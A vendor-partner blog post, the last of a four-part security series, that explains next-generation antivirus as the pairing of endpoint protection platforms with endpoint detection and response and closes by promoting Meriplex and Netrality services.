This is the fourth installment in a 4-part blog series on cyber-security, courtesy of our partner Meriplex’s Director of Information Security, Andres Ruz.
Next-generation anti-virus (NGAV) protection is a broad term that refers to a new breed of security solutions designed to counter rapidly-evolving security threats. Functioning as a necessary supplement to the traditional methods used to protect enterprise IT, NGAV solutions offer the advanced detection and remediation capabilities enterprises now require.
The limits of traditional anti-virus solutions
Traditional anti-virus (AV) software largely focused on known threats using virus signatures, IP addresses, file hashes, URLs and so on. To that end, these solutions relied on libraries of known malware characteristics. The AV software would scan files and systems, compare what it found to what was in the library, and flag matches.
In order for this type of solution to work effectively, the libraries had to be continuously updated to reflect every type of new malware created. In other words, the software could only detect what was already known to it. Unfortunately, many of today’s cyber-threats cannot be detected in this way because it is impossible, in principle, to know them beforehand.
Cyber-criminals today use malware that uses different signatures and hashes. Zero-day attacks, in which threats and vulnerabilities are unknown beforehand, and non-malware attacks, which can’t be detected by signature-based solutions, are rapidly increasing in frequency. In 2019, for example, the majority (51%) of cyber-attacks globally were malware-free. In 2018, that figure was just 40%. And if 51% doesn’t sound too bad, consider this: In North America, 74% of cyber-attacks were malware-free.
It’s clear that a new approach is necessary.
The NGAV Difference
NGAV is more of a concept than a specific technology and has several competing definitions. Generally speaking, NGAV refers to modern antivirus software that goes beyond performing signature-based detection and utilizes advanced technologies – such as artificial intelligence (AI), machine learning, and analytics – to detect anomalous behavior in systems.
For our purposes, we’ll define NGAV solutions as those combining traditional endpoint protection platforms (EPP) and modern endpoint detection and response (EDR) technologies.
An EPP provides security to endpoints – workstations, laptops, servers, and users’ mobile devices – by leveraging firewalls, port and device controls, and malware detection. Since over 80% of cyber-attacks focus on endpoints, the utilization of EPPs is important as they can effectively protect against known, signature-based malware. Nevertheless, they are no longer enough.
Endpoint detection and response (EDR) systems continuously monitor and analyze endpoint activity, enabling rapid responses to issues like zero-day and malware-free attacks, employee errors, advanced persistent threats (APT) and ransomware. The key is this: advanced cyber-threats that have successfully penetrated the front-line defenses of your EPP will create anomalies in your systems that EDR solutions can detect.
Analyzing vast amounts of real-time endpoint data and leveraging AI, machine learning, and advanced analytics, enable EDR systems to detect any abnormal behavior in your systems indicating a possible security breach. When working in concert, EPP and EDR deliver a complete prevention, detection and response system for rapid analysis and remediation of any security issue in the network.
Combining EPP and EDR for your NGAV
To ensure the highest level of security when creating your organization’s NGAV, it is critical to evaluate EPP and EDR solutions’ abilities to seamlessly integrate and flawlessly operate together. The best way to guarantee that your assets are protected is to use the same provider for both solutions.
Meriplex leverages an advanced endpoint protection platform to provide best-in-class NGAV to our clients. Using this platform creates a consistent ecosystem that allows cross-linking of all relevant assets and synchronized remediation of incidents and vulnerabilities. The maturity of these solutions allows for an incremental adoption approach based on an individual organization’s needs.
As today’s threats become increasingly complex and dangerous, the tools and methodologies used to combat them call for more advanced technologies, such as AI, machine learning, and advanced analytics. Located at the edge – the periphery of the network – Netrality’s interconnected data centers provide the speed, bandwidth, and processing power NGAV and other next-gen security technologies demand. Contact us for more information.